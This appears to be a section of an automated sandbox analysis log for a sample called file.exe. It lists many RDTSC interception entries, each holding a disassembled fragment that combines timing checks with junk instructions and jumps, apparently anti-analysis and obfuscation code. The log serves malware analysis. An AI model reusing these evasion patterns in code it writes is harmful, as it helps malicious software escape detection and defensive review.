Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8858B second address: B88593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B88593 second address: B8859E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B88829 second address: B8885A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0E4A438h 0x00000009 popad 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pushad 0x00000011 jmp 00007F10E0E4A42Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8885A second address: B88873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0B669D1h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B88873 second address: B8887E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8BA8F second address: B8BA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8FD8A second address: B8FD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B938AD second address: B938B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B55F20 second address: B55F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B55F25 second address: B3A7FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F10E0B669C8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 lea eax, dword ptr [ebp+12489CDBh] 0x00000029 mov edi, dword ptr [ebp+122D35C8h] 0x0000002f sbb ecx, 58D28E99h 0x00000035 push eax 0x00000036 pushad 0x00000037 jmp 00007F10E0B669CAh 0x0000003c pushad 0x0000003d jo 00007F10E0B669C6h 0x00000043 jmp 00007F10E0B669CFh 0x00000048 popad 0x00000049 popad 0x0000004a mov dword ptr [esp], eax 0x0000004d mov edx, 20C3F873h 0x00000052 call dword ptr [ebp+122D1A8Ch] 0x00000058 pushad 0x00000059 pushad 0x0000005a push esi 0x0000005b pop esi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B565AF second address: B565DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F10E0E4A435h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B565DD second address: B56657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jnc 00007F10E0B669CEh 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F10E0B669D1h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d jnc 00007F10E0B669D4h 0x00000023 pop eax 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007F10E0B669C8h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 00000018h 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e mov ecx, dword ptr [ebp+12480128h] 0x00000044 push 80D6157Eh 0x00000049 jc 00007F10E0B669D0h 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56EE7 second address: B56EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56EEB second address: B56F09 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F10E0B669C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d js 00007F10E0B669CCh 0x00000013 jns 00007F10E0B669C6h 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56F09 second address: B56F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F10E0E4A428h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov edx, dword ptr [ebp+122D34D8h] 0x00000027 push 0000001Eh 0x00000029 adc cx, 256Fh 0x0000002e mov ch, 05h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push edx 0x00000034 jnl 00007F10E0E4A426h 0x0000003a pop edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56F4F second address: B56F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B572E7 second address: B57353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F10E0E4A436h 0x00000008 jne 00007F10E0E4A426h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F10E0E4A428h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e sub edx, 415CBB79h 0x00000034 lea eax, dword ptr [ebp+12489D1Fh] 0x0000003a mov dword ptr [ebp+122D34C4h], edx 0x00000040 nop 0x00000041 jmp 00007F10E0E4A42Fh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push edi 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57353 second address: B57358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57358 second address: B5735D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B93B9C second address: B93BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B93D15 second address: B93D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0E4A42Eh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F10E0E4A42Ah 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B93EE8 second address: B93EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0B669CEh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B93EFF second address: B93F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B93F05 second address: B93F0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94232 second address: B94258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007F10E0E4A433h 0x00000010 je 00007F10E0E4A432h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94258 second address: B9425E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9ADF1 second address: B9ADF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9ADF7 second address: B9AE0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B99AC0 second address: B99AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jng 00007F10E0E4A426h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B99AD0 second address: B99AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B99F97 second address: B99FC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F10E0E4A428h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jno 00007F10E0E4A426h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c jnl 00007F10E0E4A42Eh 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B99FC4 second address: B99FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F10E0B669D7h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F10E0B669CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9A2C4 second address: B9A2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9A2CA second address: B9A2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9A2CE second address: B9A2E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F10E0E4A42Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9A2E0 second address: B9A2EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F10E0B669C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9A2EC second address: B9A322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F10E0E4A439h 0x00000010 jmp 00007F10E0E4A42Eh 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9A322 second address: B9A328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9A4D7 second address: B9A4DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9A4DE second address: B9A508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CBh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F10E0B669D8h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA1CAA second address: BA1CC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA1CC1 second address: BA1CDB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F10E0B669DCh 0x00000008 jmp 00007F10E0B669D0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA1CDB second address: BA1D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F10E0E4A436h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jp 00007F10E0E4A426h 0x00000016 pushad 0x00000017 popad 0x00000018 push esi 0x00000019 pop esi 0x0000001a jc 00007F10E0E4A426h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13878 second address: B1387E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1387E second address: B1389F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F10E0E4A438h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1389F second address: B138BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F10E0B669D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA08EB second address: BA090C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F10E0E4A426h 0x0000000a pop ebx 0x0000000b jmp 00007F10E0E4A436h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA090C second address: BA093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D3h 0x00000007 push eax 0x00000008 jne 00007F10E0B669C6h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F10E0B669CBh 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA093B second address: BA093F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0F64 second address: BA0F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F10E0B669C6h 0x0000000c jmp 00007F10E0B669D7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0F87 second address: BA0FA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A437h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0FA4 second address: BA0FB9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F10E0B669CAh 0x00000008 pushad 0x00000009 jp 00007F10E0B669C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0FB9 second address: BA0FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0E4A439h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA060E second address: BA061E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA061E second address: BA0622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA1438 second address: BA144E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA144E second address: BA1454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA1737 second address: BA173B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA49B3 second address: BA49DE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F10E0E4A433h 0x00000008 jmp 00007F10E0E4A42Dh 0x0000000d jmp 00007F10E0E4A42Bh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jg 00007F10E0E4A42Eh 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4B34 second address: BA4B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CBh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F10E0B669D5h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4CC9 second address: BA4CEA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F10E0E4A426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F10E0E4A435h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA7602 second address: BA7614 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F10E0B669C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA7614 second address: BA7618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA7206 second address: BA720A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA720A second address: BA7235 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jne 00007F10E0E4A426h 0x00000010 jns 00007F10E0E4A426h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA7333 second address: BA7338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA7338 second address: BA734F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A431h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE2B8 second address: BAE2BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BACEB2 second address: BACEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BACEB9 second address: BACEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAD333 second address: BAD33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADFBF second address: BADFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2462 second address: BB2466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2466 second address: BB2476 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F10E0B669C6h 0x00000008 jbe 00007F10E0B669C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2476 second address: BB247C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB247C second address: BB2480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2480 second address: BB2484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB1727 second address: BB172B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB172B second address: BB1731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB1731 second address: BB1739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB1739 second address: BB1758 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A434h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB1758 second address: BB1763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F10E0B669C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB1763 second address: BB176D instructions: 0x00000000 rdtsc 0x00000002 js 00007F10E0E4A42Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB19D7 second address: BB19EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0B669CDh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB19EC second address: BB1A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F10E0E4A42Eh 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB1A07 second address: BB1A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB1A0D second address: BB1A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F10E0E4A428h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB55F1 second address: BB55F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
